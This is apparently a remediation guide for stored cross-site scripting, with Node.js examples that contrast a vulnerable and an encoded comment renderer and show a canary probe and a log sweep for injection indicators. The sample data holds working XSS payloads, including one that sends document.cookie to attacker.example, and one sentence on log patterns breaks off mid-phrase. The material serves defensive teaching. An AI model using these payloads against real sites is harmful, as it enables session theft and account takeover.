
How to remediate – Stored Cross-Site Scripting (XSS)

1. Introduction

Stored Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject malicious scripts into pages viewed by other users. It arises when untrusted data from a user, a third party, or an uploaded file is stored by the application and later included in a web page without output encoding or other proper checks. A successful attack can lead to account takeover (for example by stealing session cookies or performing actions as the victim), redirection to harmful sites, and data theft. Confidentiality, integrity, and availability may all be affected.

2. Technical Explanation

Stored XSS occurs when an application stores user-supplied input (such as comments or forum posts) and later renders it to other users without encoding it for the HTML context it is inserted into, or otherwise sanitising it. An attacker injects script content into the stored data, and the browser of anyone who views the affected page executes it. Unlike reflected XSS, the victim does not need to click a crafted link: simply visiting the page that displays the stored content is enough.

  • Exploit mechanism: An attacker submits malicious script code through an input field (e.g., a comment form). The server saves it, and when other users view the page containing this content, the script runs in their browser with the victim's session. For example, submitting `<script>alert(1)</script>` in a comment would display an alert box for every visitor to that page if the comment is rendered unencoded (the alert is a harmless proof; a real payload would exfiltrate cookies or act on the victim's behalf).
  • Scope: Web applications that accept user input and store it for later retrieval are affected. This includes forums, comment sections, profiles, private messages, support tickets, and any other dynamic content areas, including content that reaches the page indirectly (imported feeds, uploaded filenames, administrator views of user data).
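The exploit mechanism and its fix, shown together as an added example (this is not code from the original page): a Node.js comment renderer in its vulnerable form next to a hardened form that applies HTML output encoding before inserting stored data into the page. The comment records, the `escapeHtml` helper and the `renderComment*` functions are this example's own constructions.

```javascript
// Added example, not the page's own code. Renders stored comments two ways:
// first the vulnerable form (raw concatenation), then the hardened form
// (context-aware HTML output encoding). Plain Node.js, no dependencies.

// Encoder for the HTML text and double-quoted attribute contexts. These five
// characters are the ones that let stored data break out of those contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// VULNERABLE: stored data is concatenated straight into the HTML, so anything
// the attacker saved in the comment is parsed by the browser as markup.
function renderCommentUnsafe(comment) {
  return `<article class="comment" data-author="${comment.author}">` +
         `<p>${comment.body}</p></article>`;
}

// HARDENED: every stored value is encoded for the context it lands in. The
// body goes into HTML text and the author into a double-quoted attribute; the
// same encoder is correct for both of those contexts (but NOT for a JavaScript
// string, a URL, or CSS, which need their own encoders).
function renderCommentSafe(comment) {
  return `<article class="comment" data-author="${escapeHtml(comment.author)}">` +
         `<p>${escapeHtml(comment.body)}</p></article>`;
}

// Constructed sample records: what an attacker might have submitted through a
// comment form and what the application later reads back from its database.
const storedComments = [
  { author: 'alice', body: 'Nice write-up, thanks!' },
  { author: 'mallory" onmouseover="alert(document.cookie)',           // attribute breakout
    body: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>' },
];

// True when the rendered output still carries a live script tag or an
// injected event-handler attribute, i.e. the renderer is exploitable.
function containsLiveMarkup(html) {
  return /<script\b/i.test(html) || /"\s+on\w+\s*=/i.test(html);
}

function renderAll(renderer) {
  return storedComments.map(renderer).join('\n');
}

console.log('--- unsafe ---\n' + renderAll(renderCommentUnsafe));
console.log('--- safe ---\n' + renderAll(renderCommentSafe));
```

Encoding at output time, for the specific context, is the primary fix; input validation is a useful second layer but cannot replace it, because the same stored value may be emitted into several contexts. In a real application use the templating engine's auto-escaping rather than a hand-written encoder, and confirm that raw-output helpers (`{{{ }}}`, `|safe`, `innerHTML`) are never applied to stored user data.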

3. Detection and Assessment

Confirming a vulnerability requires identifying where user-supplied data is stored and later displayed, and whether it is encoded at the point of output. A quick check submits a harmless marker string through each stored input and inspects how it comes back in the page; thorough assessment combines web application scanners with manual review of the code that renders stored data.

  • Quick checks: Submit a marker such as `xsstest<>"'` through every input that is stored (comments, profile fields, uploaded filenames), then view each page that displays it. If the characters come back as `&lt;&gt;&quot;&#x27;` the output is encoded; if they come back verbatim the page is injectable. Do not rely on HTML attributes such as `required` or `pattern` as evidence of validation: they run only in the browser, are trivially bypassed, and say nothing about what the server accepts.
  • Scanning: Burp Suite, OWASP ZAP, and other web vulnerability scanners can detect stored XSS vulnerabilities using signatures like ‘XSS Stored’. These are examples only; results should be manually verified.
  • Logs and evidence: Server logs may show the injection of malicious script code in user input fields. Look for patterns matching `
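Two of the checks above in runnable form, as an added example (not code from the original page): a canary probe that classifies how a stored marker comes back in rendered HTML, and a sweep over access-log lines for common script-injection indicators. The log lines, the log format, the canary prefix and the indicator patterns are all this example's own assumptions.

```javascript
// Added example, not the page's own code. (1) canary probe for stored fields,
// (2) access-log sweep for injection indicators. Plain Node.js, no dependencies.

// (1) Canary probe. The marker carries a unique tag so it can be located in any
// page later, plus the characters an output encoder must neutralise.
function makeCanary(tag) {
  return `xsscanary${tag}<>"'`;
}

// Classify how the stored canary was rendered. 'raw' means the characters
// reached the HTML untouched (injectable); 'encoded' means output encoding is
// in place; 'partial' means they were stripped or altered; 'missing' means the
// submission was rejected or is not displayed on this page.
function classifyCanary(html, tag) {
  const marker = 'xsscanary' + tag;
  const idx = html.indexOf(marker);
  if (idx === -1) return 'missing';
  const tail = html.slice(idx + marker.length, idx + marker.length + 32);
  if (tail.startsWith('<>')) return 'raw';
  if (tail.startsWith('&lt;&gt;')) return 'encoded';
  return 'partial';
}

// (2) Log sweep. Indicator patterns are assumptions chosen for this example;
// tune them to the application, and treat every hit as something to verify.
const INDICATORS = [
  /<script\b/i,
  /<\/script/i,
  /\bon\w+\s*=/i,                         // onerror=, onload=, onmouseover=
  /javascript\s*:/i,
  /<(?:img|svg|iframe|object|embed)\b/i,
];

// Percent-decode up to twice so double-encoded payloads are also matched;
// an undecodable value is matched as-is.
function decodeForMatch(s) {
  let out = s;
  for (let i = 0; i < 2; i++) {
    try {
      const d = decodeURIComponent(out.replace(/\+/g, ' '));
      if (d === out) break;
      out = d;
    } catch {
      break;
    }
  }
  return out;
}

// Constructed access-log lines in a combined-log-like format. Only the request
// line is inspected; POST bodies are usually not logged, so a sweep like this
// sees GET submissions and query-string parameters only.
const sampleLog = [
  '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /comments?text=Great+post HTTP/1.1" 200 512',
  '203.0.113.9 - - [10/Oct/2024:13:56:01 +0000] "GET /comments?text=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 520',
  '198.51.100.4 - - [10/Oct/2024:13:57:12 +0000] "GET /profile?bio=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E HTTP/1.1" 200 640',
  '203.0.113.7 - - [10/Oct/2024:13:58:40 +0000] "GET /comments?text=%253Csvg%2Fonload%3Dalert(1)%253E HTTP/1.1" 200 518',
];

// Returns one hit per suspicious line: the raw line, the decoded request
// target, and which indicator patterns matched.
function scanLogLines(lines) {
  const hits = [];
  for (const line of lines) {
    const m = line.match(/"(?:GET|POST) (\S+)/);
    if (!m) continue;
    const decoded = decodeForMatch(m[1]);
    const matched = INDICATORS.filter((re) => re.test(decoded)).map((re) => re.source);
    if (matched.length) hits.push({ line, decoded, matched });
  }
  return hits;
}

for (const hit of scanLogLines(sampleLog)) {
  console.log(`${hit.decoded}\n  matched: ${hit.matched.join(' | ')}`);
}
```

A log hit shows that a payload was submitted, not that it was stored or that it executes; confirm by locating the record and rendering the page that displays it. Because most stored-XSS submissions arrive in POST bodies that the web server does not log, the canary probe and a review of the stored data itself give far better coverage than the access log alone.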